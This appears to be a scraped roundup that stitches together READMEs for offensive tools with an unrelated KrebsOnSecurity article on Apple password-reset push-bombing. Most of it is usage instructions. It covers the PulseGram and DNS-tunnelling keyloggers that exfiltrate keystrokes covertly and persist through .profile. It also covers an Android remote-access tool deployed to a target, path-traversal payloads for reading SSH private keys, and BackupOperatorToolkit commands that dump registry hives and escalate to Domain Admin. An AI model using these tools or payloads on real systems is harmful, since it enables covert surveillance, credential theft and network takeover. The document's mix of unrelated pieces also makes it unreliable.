PulseGram is a keylogger integrated with a Telegram bot. It is a monitoring tool that captures keystrokes, clipboard content, and screenshots, sending all the information to a configured Telegram bot. It is designed for use in adversary simulations and security testing contexts.

⚠️ Warning: This project is for educational purposes and security testing in authorized environments only. Unauthorized use of this tool may be illegal and is prohibited.

Author: Omar Salazar

Version: V.1.0

Errors are logged to an errors_log.txt file to facilitate debugging.

Clone the repository: `git clone https://github.com/TaurusOmar/pulsegram`, then `cd pulsegram`.

Install dependencies: Make sure you have Python 3 and pip installed. Then run: `pip install -r requirements.txt`

Set up the Telegram bot token: Create a bot on Telegram using BotFather. Copy your token and paste it into the code in main.py where the bot is initialized.

Copy your chat ID into keylogger.py: `chat_id="131933xxxx"`

Run the tool on the target machine with:

python pulsegram.py

This is the main file of the tool, which initializes the bot and launches asynchronous tasks to capture and send data.

- Bot(token="..."): Initializes the Telegram bot with your personal token.
- asyncio.gather(...): Launches multiple tasks to execute clipboard monitoring, screenshot capture, and keystroke logging.
- log_error: In case of errors, logs them in an errors_log.txt file.

This module contains auxiliary functions that assist the overall operation of the tool.

- log_error(): Logs any errors in errors_log.txt with a date and time format.
- get_clipboard_content(): Captures the current content of the clipboard.
- capture_screenshot(): Takes a screenshot and temporarily saves it to send it to the Telegram bot.

This module handles keylogging, clipboard monitoring, and screenshot captures.

- capture_keystrokes(bot): Asynchronous function that captures keystrokes and sends the information to the Telegram bot.
- send_keystrokes_to_telegram(bot): This function sends the accumulated keystrokes to the bot.
- capture_screenshots(bot): Periodically captures an image of the screen and sends it to the bot.
- log_clipboard(bot): Sends the contents of the clipboard to the bot.

Change the capture and information sending time interval.

    async def send_keystrokes_to_telegram(bot):
        global keystroke_buffer
        while True:
            await asyncio.sleep(1)  # Change the key sending interval

    async def capture_screenshots(bot):
        while True:
            await asyncio.sleep(30)  # Change the screenshot capture interval
            try:

    async def log_clipboard(bot):
        previous_content = ""
        while True:
            await asyncio.sleep(5)  # Change the interval to check for clipboard changes
            current_content = get_clipboard_content()

This project is for educational purposes only and for security testing in your own environments or with express authorization. Unauthorized use of this tool may violate local laws and privacy policies.

Contributions are welcome. Please ensure to respect the code of conduct when collaborating.

This project is licensed under the MIT License.

Remote administration tool for Android

Clone the repository: `git clone https://github.com/Tomiwa-Ot/moukthar.git`

Move the server files to `/var/www/html/` and install dependencies:

    mv moukthar/Server/* /var/www/html/
    cd /var/www/html/c2-server
    composer install
    cd /var/www/html/web-socket/
    composer install
    cd /var/www
    chown -R www-data:www-data .
    chmod -R 777 .

The default credentials are username: android and password: android

Create the MySQL user:

    CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';
    GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';
    FLUSH PRIVILEGES;

c2-server/.env and web-socket/.env

database.sql

Start the web socket server, or install it as a systemd service:

    php Server/web-socket/App.php
    # OR
    sudo mv Server/websocket.service /etc/systemd/system/
    sudo systemctl daemon-reload
    sudo systemctl enable websocket.service
    sudo systemctl start websocket.service

- Modify `/etc/apache2/sites-available/000-default.conf`

      ErrorLog ${APACHE_LOG_DIR}/error.log
      CustomLog ${APACHE_LOG_DIR}/access.log combined

- Modify `/etc/apache2/apache2.conf`

  Comment this section #

  Add this

- Increase the PHP file upload max size in `/etc/php/./apache2/php.ini`

      ; Increase size to permit large file uploads from client
      upload_max_filesize = 128M
      ; Set post_max_size to upload_max_filesize + 1
      post_max_size = 129M

- Set the web socket server address in the `<script>` tag in `c2-server/src/View/home.php` and `c2-server/src/View/features/files.php`

      const ws = new WebSocket('ws://IP_ADDRESS:8080');

- Restart Apache using the command below

      sudo a2enmod rewrite && sudo service apache2 restart

- Set the C2 server and web socket server addresses in the client `functionality/Utils.java`

      public static final String C2_SERVER = "http://localhost";
      public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";

- Compile APK using Android Studio and deploy to target




Several Apple customers recently reported being targeted in elaborate phishing attacks that involve what appears to be a bug in Apple’s password reset feature. In this scenario, a target’s Apple devices are forced to display dozens of system-level prompts that prevent the devices from being used until the recipient responds “Allow” or “Don’t Allow” to each prompt. Assuming the user manages not to fat-finger the wrong button on the umpteenth password reset request, the scammers will then call the victim while spoofing Apple support in the caller ID, saying the user’s account is under attack and that Apple support needs to “verify” a one-time code.

Some of the many notifications Patel says he received from Apple all at once.

Parth Patel is an entrepreneur who is trying to build a startup in the conversational AI space. On March 23, Patel documented on Twitter/X a recent phishing campaign targeting him that involved what’s known as a “push bombing” or “MFA fatigue” attack, wherein the phishers abuse a feature or weakness of a multi-factor authentication (MFA) system in a way that inundates the target’s device(s) with alerts to approve a password change or login.

“All of my devices started blowing up, my watch, laptop and phone,” Patel told KrebsOnSecurity. “It was like this system notification from Apple to approve [a reset of the account password], but I couldn’t do anything else with my phone. I had to go through and decline like 100-plus notifications.”

Some people confronted with such a deluge may eventually click “Allow” to the incessant password reset prompts — just so they can use their phone again. Others may inadvertently approve one of these prompts, which will also appear on a user’s Apple watch if they have one.

But the attackers in this campaign had an ace up their sleeves: Patel said after denying all of the password reset prompts from Apple, he received a call on his iPhone that said it was from Apple Support (the number displayed was 1-800-275-2273, Apple’s real customer support line).

“I pick up the phone and I’m super suspicious,” Patel recalled. “So I ask them if they can verify some information about me, and after hearing some aggressive typing on his end he gives me all this information about me and it’s totally accurate.”

All of it, that is, except his real name. Patel said when he asked the fake Apple support rep to validate the name they had on file for the Apple account, the caller gave a name that was not his but rather one that Patel has only seen in background reports about him that are for sale at a people-search website called PeopleDataLabs.

Patel said he has worked fairly hard to remove his information from multiple people-search websites, and he found PeopleDataLabs uniquely and consistently listed this inaccurate name as an alias on his consumer profile.

“For some reason, PeopleDataLabs has three profiles that come up when you search for my info, and two of them are mine but one is an elementary school teacher from the midwest,” Patel said. “I asked them to verify my name and they said Anthony.”

Patel said the goal of the voice phishers is to trigger an Apple ID reset code to be sent to the user’s device, which is a text message that includes a one-time password. If the user supplies that one-time code, the attackers can then reset the password on the account and lock the user out. They can also then remotely wipe all of the user’s Apple devices.

Chris is a cryptocurrency hedge fund owner who asked that only his first name be used so as not to paint a bigger target on himself. Chris told KrebsOnSecurity he experienced a remarkably similar phishing attempt in late February.

“The first alert I got I hit ‘Don’t Allow’, but then right after that I got like 30 more notifications in a row,” Chris said. “I figured maybe I sat on my phone weird, or was accidentally pushing some button that was causing these, and so I just denied them all.”

Chris says the attackers persisted hitting his devices with the reset notifications for several days after that, and at one point he received a call on his iPhone that said it was from Apple support.

“I said I would call them back and hung up,” Chris said, demonstrating the proper response to such unbidden solicitations. “When I called back to the real Apple, they couldn’t say whether anyone had been in a support call with me just then. They just said Apple states very clearly that it will never initiate outbound calls to customers — unless the customer requests to be contacted.”

Massively freaking out that someone was trying to hijack his digital life, Chris said he changed his passwords and then went to an Apple store and bought a new iPhone. From there, he created a new Apple iCloud account using a brand new email address.

Chris said he then proceeded to get even more system alerts on his new iPhone and iCloud account — all the while still sitting at the local Apple Genius Bar.

Chris told KrebsOnSecurity his Genius Bar tech was mystified about the source of the alerts, but Chris said he suspects that whatever the phishers are abusing to rapidly generate these Apple system alerts requires knowing the phone number on file for the target’s Apple account. After all, that was the only aspect of Chris’s new iPhone and iCloud account that hadn’t changed.

“Ken” is a security industry veteran who spoke on condition of anonymity. Ken said he first began receiving these unsolicited system alerts on his Apple devices earlier this year, but that he has not received any phony Apple support calls as others have reported.



“This recently happened to me in the middle of the night at 12:30 a.m.,” Ken said. “And even though I have my Apple watch set to remain quiet during the time I’m usually sleeping at night, it woke me up with one of these alerts. Thank god I didn’t press ‘Allow,’ which was the first option shown on my watch. I had to scroll watch the wheel to see and press the ‘Don’t Allow’ button.”

Ken shared this photo he took of an alert on his watch that woke him up at 12:30 a.m. Ken said he had to scroll on the watch face to see the “Don’t Allow” button.

Ken didn’t know it when all this was happening (and it’s not at all obvious from the Apple prompts), but clicking “Allow” would not have allowed the attackers to change Ken’s password. Rather, clicking “Allow” displays a six digit PIN that must be entered on Ken’s device — allowing Ken to change his password. It appears that these rapid password reset prompts are being used to make a subsequent inbound phone call spoofing Apple more believable.

Ken said he contacted the real Apple support and was eventually escalated to a senior Apple engineer. The engineer assured Ken that turning on an Apple Recovery Key for his account would stop the notifications once and for all.

A recovery key is an optional security feature that Apple says “helps improve the security of your Apple ID account.” It is a randomly generated 28-character code, and when you enable a recovery key it is supposed to disable Apple’s standard account recovery process. The thing is, enabling it is not a simple process, and if you ever lose that code in addition to all of your Apple devices you will be permanently locked out.

Ken said he enabled a recovery key for his account as instructed, but that it hasn’t stopped the unbidden system alerts from appearing on all of his devices every few days.



KrebsOnSecurity tested Ken’s experience, and can confirm that enabling a recovery key does nothing to stop a password reset prompt from being sent to associated Apple devices. Visiting Apple’s “forgot password” page — https://iforgot.apple.com — asks for an email address and for the visitor to solve a CAPTCHA.

After that, the page will display the last two digits of the phone number tied to the Apple account. Filling in the missing digits and hitting submit on that form will send a system alert, whether or not the user has enabled an Apple Recovery Key.

The password reset page at iforgot.apple.com.

What sanely designed authentication system would send dozens of requests for a password change in the span of a few moments, when the first requests haven’t even been acted on by the user? Could this be the result of a bug in Apple’s systems?

Apple has not yet responded to requests for comment.

Throughout 2022, a criminal hacking group known as LAPSUS$ used MFA bombing to great effect in intrusions at Cisco, Microsoft and Uber. In response, Microsoft began enforcing “MFA number matching,” a feature that displays a series of numbers to a user attempting to log in with their credentials. These numbers must then be entered into the account owner’s Microsoft authenticator app on their mobile device to verify they are logging into the account.
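The number-matching idea described above can be illustrated with a minimal sketch. This is not Microsoft's implementation: the function names and the two-digit challenge are assumptions made for illustration. The point is only that approval requires typing a number shown on the login screen, so a reflexive tap on an approval prompt is no longer enough.

```python
import hmac
import secrets


def new_challenge() -> str:
    """Return a random two-digit number (10-99) to display on the login screen."""
    return str(secrets.randbelow(90) + 10)


def approve_login(displayed: str, typed_in_app: str) -> bool:
    """Approve only when the number typed in the app matches the one displayed."""
    # compare_digest avoids leaking how many leading characters matched.
    return hmac.compare_digest(displayed.encode(), typed_in_app.encode())


challenge = new_challenge()
print(approve_login(challenge, challenge))  # the user read the number off the login screen
print(approve_login(challenge, "00"))       # a blind guess; "00" is never issued here
```

Someone who is being flooded with prompts but is not looking at the attacker's login screen has no way to know which number to enter.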

Kishan Bagaria is a hobbyist security researcher and engineer who founded the website texts.com (now owned by Automattic), and he’s convinced Apple has a problem on its end. In August 2019, Bagaria reported to Apple a bug that allowed an exploit he dubbed “AirDoS” because it could be used to let an attacker infinitely spam all nearby iOS devices with a system-level prompt to share a file via AirDrop — a file-sharing capability built into Apple products.

Apple fixed that bug nearly four months later in December 2019, thanking Bagaria in the associated security bulletin. Bagaria said Apple’s fix was to add stricter rate limiting on AirDrop requests, and he suspects that someone has figured out a way to bypass Apple’s rate limit on how many of these password reset requests can be sent in a given timeframe.
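To make the rate-limiting idea concrete, here is a small sliding-window sketch of how a service could cap the number of prompts sent to one account in a given timeframe. Nothing here reflects how Apple's systems work; the class name, the limit of three prompts, and the ten-minute window are all assumptions chosen for illustration.

```python
from collections import defaultdict, deque


class PromptRateLimiter:
    """Allow at most max_prompts per account within window_seconds."""

    def __init__(self, max_prompts: int, window_seconds: float) -> None:
        self.max_prompts = max_prompts
        self.window_seconds = window_seconds
        self._sent = defaultdict(deque)  # account -> timestamps of recent prompts

    def allow(self, account: str, now: float) -> bool:
        recent = self._sent[account]
        # Drop timestamps that have aged out of the window.
        while recent and now - recent[0] >= self.window_seconds:
            recent.popleft()
        if len(recent) >= self.max_prompts:
            return False  # over the limit: do not send another prompt
        recent.append(now)
        return True


limiter = PromptRateLimiter(max_prompts=3, window_seconds=600)
results = [limiter.allow("user@example.com", now=t) for t in (0, 1, 2, 3, 601)]
print(results)  # [True, True, True, False, True]
```

With a limit like this keyed on the target account rather than on the requester, dozens of prompts in a few moments would not be possible regardless of how many sources the requests come from.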

“I think this could be a legit Apple rate limit bug that should be reported,” Bagaria said.

Apple seems to require a phone number to be on file for your account, but after you’ve set up the account it doesn’t have to be a mobile phone number. KrebsOnSecurity’s testing shows Apple will accept a VOIP number (like Google Voice). So, changing your account phone number to a VOIP number that isn’t widely known would be one mitigation here.

One caveat with the VOIP number idea: Unless you include a real mobile number, Apple’s iMessage and FaceTime applications will be disabled for that device. This might be a bonus for those concerned about reducing the overall attack surface of their Apple devices, since zero-click zero-days in these applications have repeatedly been used by spyware purveyors.

Also, it appears Apple’s password reset system will accept and respect email aliases. Adding a “+” character after the username portion of your email address — followed by a notation specific to the site you’re signing up at — lets you create an infinite number of unique email addresses tied to the same account.

For instance, if I were signing up at example.com, I might give my email address as krebsonsecurity+example@gmail.com. Then, I simply go back to my inbox and create a corresponding folder called “Example,” along with a new filter that sends any email addressed to that alias to the Example folder. In this case, however, perhaps a less obvious alias than “+apple” would be advisable.
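The alias construction is simple enough to sketch in a few lines. The helper name `plus_alias` is hypothetical, and whether a given mail provider honors "+" aliases is something to confirm with that provider.

```python
def plus_alias(address: str, tag: str) -> str:
    """Insert "+tag" after the username portion of an email address."""
    user, sep, domain = address.rpartition("@")
    if not sep or not user or not domain:
        raise ValueError(f"not an email address: {address!r}")
    return f"{user}+{tag}@{domain}"


print(plus_alias("krebsonsecurity@gmail.com", "example"))
# krebsonsecurity+example@gmail.com
```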

Update, March 27, 5:06 p.m. ET: Added perspective on Ken’s experience. Also included a What Can You Do? section.

This post-exploitation keylogger will covertly exfiltrate keystrokes to a server.

The tool is built for lightweight exfiltration and persistence, properties that help it avoid detection. It uses DNS tunneling/exfiltration to bypass firewalls.

The server uses python3.

To install dependencies, run `python3 -m pip install -r requirements.txt`

To start the server, run `python3 main.py`

    usage: dns exfiltration server [-h] [-p PORT] ip domain

    positional arguments:
      ip
      domain

    options:
      -h, --help            show this help message and exit
      -p PORT, --port PORT  port to listen on

By default, the server listens on UDP port 53. Use the -p flag to specify a different port.

ip is the IP address of the server. It is used in SOA and NS records, which allow other nameservers to find the server.

domain is the domain to listen for, which should be the domain that the server is authoritative for.

On the registrar, change your domain's nameservers to custom DNS.

Point them to two domains, ns1.example.com and ns2.example.com.

Add records that point the nameserver domains to your exfiltration server's IP address.

This is the same as setting glue records.

The Linux keylogger is two bash scripts. connection.sh is used by the logger.sh script to send the keystrokes to the server. If you want to manually send data, such as a file, you can pipe data to the connection.sh script. It will automatically establish a connection and send the data.

logger.sh

    # Usage: logger.sh [-options] domain
    # Positional Arguments:
    #     domain: the domain to send data to
    # Options:
    #     -p path: give path to log file to listen to
    #     -l: run the logger with warnings and errors printed

To start the keylogger, run the command ./logger.sh [domain] && exit. This will silently start the keylogger, and any inputs typed will be sent. The && exit at the end will cause the shell to close on exit. Without it, exiting will bring you back to the non-keylogged shell. Remove the &> /dev/null to display error messages.

The -p option will specify the location of the temporary log file where all the inputs are sent to. By default, this is /tmp/.

The -l option will show warnings and errors. Can be useful for debugging.

logger.sh and connection.sh must be in the same directory for the keylogger to work. If you want persistence, you can add the command to .profile to start on every new interactive shell.

connection.sh

    Usage: command [-options] domain
    Positional Arguments:
        domain: the domain to send data to
    Options:
        -n: number of characters to store before sending a packet

To build the keylogging program, run make in the windows directory. To build with reduced size and some amount of obfuscation, make the production target. This will create the build directory for you and output to a file named logger.exe in the build directory.

make production domain=example.com

You can also choose to build the program with debugging by making the debug target.

make debug domain=example.com

For both targets, you will need to specify the domain the server is listening for.

You can use dig to send requests to the server:

`dig @127.0.0.1 a.1.1.1.example.com A +short` sends a connection request to a server on localhost.

`dig @127.0.0.1 b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com A +short` sends a test message to localhost.

Replace example.com with the domain the server is listening for.

A record requests starting with a indicate the start of a "connection." When the server receives them, it will respond with a fake non-reserved IP address where the last octet contains the id of the client.

The following is the format to follow for starting a connection: a.1.1.1.[sld].[tld].

The server will respond with an IP address in the following format: 123.123.123.[id]

Concurrent connections cannot exceed 254, and clients are never considered "disconnected."

A record requests starting with b indicate exfiltrated data being sent to the server.

The following is the format to follow for sending data after establishing a connection: b.[packet #].[id].[data].[sld].[tld].

The server will respond with [code].123.123.123

id is the id that was established on connection. Data is sent as ASCII encoded in hex.

code is one of the codes described below.

200: OK. If the client sends a request that is processed normally, the server will respond with code 200.

201: Malformed Record Requests. If the client sends a malformed record request, the server will respond with code 201.

202: Non-Existent Connections. If the client sends a data packet with an id greater than the # of connections, the server will respond with code 202.

203: Out of Order Packets. If the client sends a packet with a packet id that doesn't match what is expected, the server will respond with code 203. Clients and servers should reset their packet numbers to 0. Then the client can resend the packet with the new packet id.

204: Reached Max Connection. If the client attempts to create a connection when the max has been reached, the server will respond with code 204.

Clients should rely on responses as acknowledgements of received packets. If they do not receive a response, they should resend the same payload.
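For anyone reviewing DNS logs or captures, the query-name formats described above can be recognized and decoded with a short parser. This is an illustrative sketch based only on the formats documented here, not the project's server code; the function name `parse_query` and the returned dictionary layout are assumptions.

```python
def parse_query(name: str, domain: str):
    """Parse a query name of the form a.1.1.1.<domain> or b.<packet>.<id>.<hex>.<domain>.

    Returns a dict describing the request, or None if the name does not match.
    """
    name = name.rstrip(".").lower()
    suffix = "." + domain.lower()
    if not name.endswith(suffix):
        return None
    labels = name[: -len(suffix)].split(".")
    if len(labels) != 4 or labels[0] not in ("a", "b"):
        return None
    kind, packet, client_id, data = labels
    if not (packet.isdecimal() and client_id.isdecimal()):
        return None
    if kind == "a":
        return {"kind": "connect"}
    try:
        # Data is ASCII encoded in hex; bad hex or non-ASCII bytes raise ValueError.
        payload = bytes.fromhex(data).decode("ascii")
    except ValueError:
        return None
    return {"kind": "data", "packet": int(packet), "id": int(client_id), "payload": payload}


test_name = "b.1.1.54686520717569636B2062726F776E20666F782E1B.example.com"
print(repr(parse_query(test_name, "example.com")["payload"]))
# 'The quick brown fox.\x1b'
```

The trailing `\x1b` in the decoded test message is an ASCII escape character, which is one reason captured input is easier to read with control characters made visible.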

The log file containing user inputs contains ASCII control characters, such as backspace, delete, and carriage return. If you print the contents using something like cat, you should select the appropriate option to print ASCII control characters, such as -v for cat, or open it in a text-editor.
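As an alternative to `cat -v`, the same kind of rendering can be sketched in Python. The function below approximates the caret and `M-` notation that `cat -v` uses, leaving tabs and newlines untouched; the function names are hypothetical and the output is meant to be close to, not guaranteed identical with, what `cat -v` prints.

```python
def _visible(b: int) -> str:
    """Render one byte in caret / M- notation."""
    if b >= 0x80:
        return "M-" + _visible(b - 0x80)
    if b == 0x7F:
        return "^?"                 # delete
    if b < 0x20:
        return "^" + chr(b + 0x40)  # e.g. 0x08 (backspace) -> ^H, 0x0D (CR) -> ^M
    return chr(b)


def show_control_chars(data: bytes) -> str:
    """Make control characters visible while keeping tabs and newlines as-is."""
    return "".join(chr(b) if b in (0x09, 0x0A) else _visible(b) for b in data)


print(show_control_chars(b"ls -la\x7f\x7fl\r"))
# ls -la^?^?l^M
```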

The keylogger relies on script, so the keylogger won't run in non-interactive shells.

For some reason, the Windows DnsQuery_A always sends duplicate requests. The server will process it fine because it discards repeated packets.

SSH Private Key Looting Wordlists. A Collection Of Wordlists To Aid In Locating Or Brute-Forcing SSH Private Key File Names.

?file=../../../../../../../../home/user/.ssh/id_rsa

?file=../../../../../../../../home/user/.ssh/id_rsa-cert

This repository contains a collection of wordlists to aid in locating or brute-forcing SSH private key file names. These wordlists can be useful for penetration testers, security researchers, and anyone else interested in assessing the security of SSH configurations.

These wordlists can be used with tools such as Burp Intruder, Hydra, custom python scripts, or any other bruteforcing tool that supports custom wordlists. They can help expand the scope of your brute-forcing or enumeration efforts when targeting SSH private key files.

This wordlist repository was inspired by John Hammond in his vlog "Don't Forget This One Hacking Trick."

Please use these wordlists responsibly and only on systems you are authorized to test. Unauthorized use is illegal.

The tool in question was created in Go and its main objective is to search for API keys in JavaScript files and HTML pages.

It works by checking the source code of web pages and script files for strings that are identical or similar to API keys. These keys are often used for authentication to online services such as third-party APIs and are confidential and should not be shared publicly.
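The general approach, scanning source text for strings shaped like known key formats, can be sketched as follows. This is not Mantra's implementation (which is written in Go); it is a Python illustration, and the two patterns are assumptions based on widely documented key prefixes. The sample keys are placeholders, not real credentials.

```python
import re

# Assumed patterns for two widely documented key formats.
PATTERNS = {
    "Google API key": re.compile(r"AIza[0-9A-Za-z_\-]{35}"),
    "AWS access key ID": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
}


def find_key_candidates(source: str):
    """Return (label, matched_text) pairs for strings that look like API keys."""
    hits = []
    for label, pattern in PATTERNS.items():
        for match in pattern.finditer(source):
            hits.append((label, match.group(0)))
    return hits


fake_google_key = "AIza" + "x" * 35  # placeholder with the right shape
sample_js = f'''
const mapsKey = "{fake_google_key}";
const awsKey = "AKIAIOSFODNN7EXAMPLE";
'''
for label, value in find_key_candidates(sample_js):
    print(f"{label}: {value}")
```

Pattern matching of this kind produces candidates rather than confirmed leaks, so each hit still needs to be checked by a person.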

By using this tool, developers can quickly identify if their API keys are leaking and take steps to fix the problem before they are compromised. Furthermore, the tool can be useful for security officers, who can use it to verify that applications and websites that use external APIs are adequately protecting their keys.

In summary, this tool is an efficient and accurate solution to help secure your API keys and prevent sensitive information leaks.

git clone https://github.com/MrEmpy/Mantra

cd Mantra

make

./build/mantra-amd64-linux -h

The goal of this project is to accumulate the secret keys / secret materials related to various web frameworks, that are publicly available and potentially used by developers. These secrets will be utilized by the Blacklist3r tools to audit the target application and verify the usage of these pre-published keys.

We are releasing this project with a .NET machine key tool to identify usage of pre-shared Machine Keys in the application for encryption and decryption of the forms authentication cookie.

Note: Requires Visual Studio 2019, not 2022. Visual Studio 2022 does not support .NET Framework 4.5, which this repo relies on.

The BackupOperatorToolkit (BOT) has 4 different modes that allow you to escalate from Backup Operator to Domain Admin.

Use "runas.exe /netonly /user:domain.dk\backupoperator powershell.exe" before running the tool.

The SERVICE mode creates a service on the remote host that will be executed when the host is rebooted.

The service is created by modifying the remote registry. This is possible by passing the "REG_OPTION_BACKUP_RESTORE" value to RegOpenKeyExA and RegSetValueExA.

It is not possible to have the service executed immediately as the service control manager database "SERVICES_ACTIVE_DATABASE" is loaded into memory at boot and can only be modified with local administrator privileges, which the Backup Operator does not have.

.\BackupOperatorToolkit.exe SERVICE \\PATH\To\Service.exe \\TARGET.DOMAIN.DK SERVICENAME DISPLAYNAME DESCRIPTION

The DSRM mode will set the DsrmAdminLogonBehavior registry key found in "HKLM\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" to either 0, 1, or 2.

Setting the value to 0 will only allow the DSRM account to be used when in recovery mode.

Setting the value to 1 will allow the DSRM account to be used when the Directory Services service is stopped and the NTDS is unlocked.

Setting the value to 2 will allow the DSRM account to be used with network authentication such as WinRM.
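Because this registry value controls how the DSRM account can be used, it is worth auditing on domain controllers. The following is a minimal defensive sketch that reads the value locally and describes it using the three meanings listed above. The function names are hypothetical, and the registry read only works when run on Windows.

```python
import sys

DSRM_BEHAVIOR = {
    0: "DSRM account usable only in recovery mode",
    1: "DSRM account usable when the Directory Services service is stopped",
    2: "DSRM account usable with network authentication",
}


def describe_dsrm_behavior(value) -> str:
    """Map a DsrmAdminLogonBehavior value to a human-readable description."""
    if value is None:
        return "value not set"
    return DSRM_BEHAVIOR.get(value, f"unexpected value {value}")


def read_dsrm_behavior():
    """Read DsrmAdminLogonBehavior from the local registry (Windows only)."""
    import winreg  # standard library, available only on Windows

    try:
        with winreg.OpenKey(
            winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\Lsa"
        ) as key:
            value, _value_type = winreg.QueryValueEx(key, "DsrmAdminLogonBehavior")
            return value
    except FileNotFoundError:
        return None  # the value does not exist


if sys.platform == "win32":
    print(describe_dsrm_behavior(read_dsrm_behavior()))
else:
    print(describe_dsrm_behavior(2))  # demonstration on non-Windows hosts
```

A value of 2 on a domain controller that nobody deliberately configured is a reasonable thing to investigate.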

If the DUMP mode has been used and the DSRM account has been cracked offline, set the value to 2 and log into the Domain Controller with the DSRM account which will be local administrator.

.\BackupOperatorToolkit.exe DSRM \\TARGET.DOMAIN.DK 0||1||2

The DUMP mode will dump the SAM, SYSTEM, and SECURITY hives to a local path on the remote host or upload the files to a network share.

Once the hives have been dumped you could PtH with the Domain Controller hash, crack DSRM and enable network auth, or possibly authenticate with another account found in the dumps. Accounts from other forests may be stored in these files, I'm not sure why but this has been observed on engagements with management forests. This mode is inspired by the BackupOperatorToDA project.

.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK

The IFEO (Image File Execution Options) mode will enable you to run an application when a specific process is terminated.

This could grant a shell before the SERVICE mode will in case the target host is heavily utilized and rarely rebooted.

The executable will be running as a child to the WerFault.exe process.

.\BackupOperatorToolkit.exe IFEO notepad.exe \\Path\To\pwn.exe \\TARGET.DOMAIN.DK